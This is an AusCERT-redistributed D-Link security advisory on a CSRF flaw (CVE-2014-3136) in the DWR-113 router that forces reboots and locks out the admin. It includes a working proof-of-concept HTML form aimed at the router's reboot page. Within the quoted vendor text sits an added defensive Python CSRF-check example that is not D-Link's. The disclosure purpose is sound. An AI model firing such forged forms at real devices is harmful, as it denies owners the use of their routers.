===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2014.1095
    DWR-113 Rev. Ax - CSRF causing Denial of Service - FW v. 2.02 or older
                                 8 July 2014

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           D-Link DWR-113 Rev. Ax firmware
Publisher:         D-Link
Operating System:  Network Appliance
Impact/Access:     Cross-site Request Forgery -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2014-3136

Original Bulletin:
   http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034

- --------------------------BEGIN INCLUDED TEXT--------------------

Security Advisories > SAP10034

DWR-113 Rev. Ax - CSRF causing Denial of Service - FW v. 2.02 or older

Publication ID:    SAP10034
Resolved Status:   Yes
Published on:      2 July 2014 4:34 GMT
Last updated on:   2 July 2014 4:43 GMT

Overview

The DWR-113 Rev. Ax firmware 2.02 and older is susceptible to a CSRF
vulnerability, which allows an attacker to forge HTML forms and execute
actions in an authorized (logged in) browser session. This vulnerability
allows an attacker to perform denial of service exploits that may cause the
device to be unreliable.

D-Link Security Incident Response Policy

All public communication on this issue will be offered at
http://securityadvisories.dlink.com/security/

Our security response team can be contacted for incident information or to
report incidents at security@dlink.com

For any non-critical security issue, help in updating firmware, or
configuration regarding this issue, please contact your D-Link Customer care
channel.

Reference

Author - Blessen Thomas - blessenthomas75@gmail.com
CVE-2014-3136

General Disclosure

Security and performance are of the utmost importance to D-Link across all
product lines.
This is not just through the development process but also through regular
firmware updates to comply with the current safety and quality standards. We
are proactively working with the sources of these reports as well as
continuing to review across the complete product line to ensure that the
vulnerabilities discovered are addressed. We will continue to update this page
to include the relevant product firmware updates addressing these concerns. In
the meantime, you can exercise the cautions below to avoid unwanted intrusion
into your D-Link product.

Immediate Recommendations for all D-Link router customers

Do not enable the Remote Management feature, since this will allow malicious
users to use this exploit from the internet. Remote Management is disabled by
default on all D-Link routers and is included for customer care
troubleshooting, if useful and the customer enables it.

If you receive unsolicited e-mails that relate to security vulnerabilities and
prompt you to action, please ignore them. Clicking on links in such e-mails
could allow unauthorised persons to access your router. Neither D-Link nor its
partners and resellers will send you unsolicited messages where you are asked
to click or install something.

Make sure that your wireless network is secure.

Do not provide your admin password to anyone. If required, we suggest updating
the password frequently.

Description

We encourage you to contact the author for further information at
blessenthomas75@gmail.com. The author can provide further details. In order to
avoid miscommunication, the following is taken directly from the author's
report:

It was observed that the D-Link DWR-113 wireless router is vulnerable to a
denial of service attack via a CSRF (Cross-Site Request Forgery)
vulnerability.
An attacker could craft a malicious CSRF exploit to change the password in the
password functionality when the user (admin) is logged in to the application,
as the user interface (admin panel) lacks the CSRF token or nonce to prevent an
attacker from changing the password. The attacker can manipulate user data by
sending the user a maliciously crafted URL. As a result, as soon as the crafted
malicious exploit is executed, the router is rebooted and the user is forced to
wait for a few minutes so that the changes can be made in the settings of the
router. Now it is observed that even though the attacker's password doesn't
work, neither does the user's current password, and the user tries a lot to
get logged in to the admin panel of the router using the user's current
password. Finally the user is forced to reset the router physically, thus
leading to a denial of service condition. Every time, the user is forced to
reset the device manually, which is a cumbersome process.

Proof of Concept code (exploit)

Restart Router by CSRF

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://192.168.0.1/rebo.htm">
      <input type="hidden" name="S00010002" value="test" />
      <input type="hidden" name="np2" value="test" />
      <input type="hidden" name="N00150004" value="0" />
      <input type="hidden" name="N00150001" value="" />
      <input type="hidden" name="N00150003" value="1080" />
      <input type="hidden" name="_cce" value="0x80150002" />
      <input type="hidden" name="_sce" value="%Ssc" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Products

Model Name   HW Version   Current FW Version   New FW Version for this Firmware
DWR-113      Ax           v. 2.02 and older    v. 2.03b02 exploit fix

Release Notes

Security patch for your D-Link router

These firmware updates address the security vulnerabilities in affected D-Link
routers. D-Link will update this continually and we strongly recommend all
users to install the relevant updates.
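The report above attributes the issue to the admin panel accepting state-changing requests without a CSRF token or nonce. As an added example, not code from D-Link's firmware or from the advisory, the gate below shows what such a handler should check before acting on a reboot or password-change form: a per-session synchronizer token compared in constant time, a POST-only rule, and an Origin/Referer check against the device's own address. The field name `_csrf`, the in-memory session store and `DEVICE_ORIGINS` are assumptions for the demonstration.

```python
# Added example (not D-Link's code): server-side CSRF checks that the
# DWR-113 admin panel, per the report above, does not perform.
import hmac
import secrets
from urllib.parse import urlsplit

DEVICE_ORIGINS = {"http://192.168.0.1"}   # the router's own web UI (assumed)
_sessions = {}                            # session id -> CSRF token (assumed store)


def login(session_id):
    """On login, mint a random token bound to this session."""
    token = secrets.token_urlsafe(32)
    _sessions[session_id] = token
    return token


def render_form(session_id):
    """Embed the session's token in every state-changing form."""
    token = _sessions[session_id]
    return ('<form method="POST" action="/rebo.htm">'
            f'<input type="hidden" name="_csrf" value="{token}" />'
            '<input type="submit" value="Reboot" /></form>')


def _origin_ok(headers):
    """Defence in depth: the submission must come from the device's own UI."""
    origin = headers.get("Origin")
    if origin is None:                    # older browsers: fall back to Referer
        ref = headers.get("Referer")
        if ref is None:
            return False                  # no provenance at all: deny
        parts = urlsplit(ref)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in DEVICE_ORIGINS


def authorize_state_change(session_id, method, form, headers):
    """Gate a reboot/password-change request; returns (allowed, reason)."""
    if method != "POST":
        return False, "state changes must not be reachable via GET"
    expected = _sessions.get(session_id)
    if expected is None:
        return False, "no authenticated session"
    supplied = form.get("_csrf", "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or wrong CSRF token"
    if not _origin_ok(headers):
        return False, "request did not originate from the device UI"
    return True, "ok"
```

A forged form like the PoC above fails on three independent counts here (GET, no `_csrf` field, foreign Origin/Referer), so fixing any one of the three would already defeat it.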
As there are different hardware revisions of our products, please check this
on your device before downloading the corresponding firmware update. The
hardware revision information can usually be found on the product label on the
underside of the product next to the serial number. Alternatively, it can also
be found in the device web configuration.

To update the firmware, please log in to the Web-GUI interface of your device
and from the menu select Maintenance -> System -> Upgrade Firmware.

If you require help, please contact your regional D-Link customer care website
for options.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If you do
not know who that is, please send an email to auscert@auscert.org.au and we
will forward your request to the appropriate person.

NOTE: Third Party Rights

This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may not
be updated when updates to the original are made. If downloading at a later
date, it is recommended that the bulletin is retrieved directly from the
author's website to ensure that the information is still current.
Contact information for the authors of the original document is included in
the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================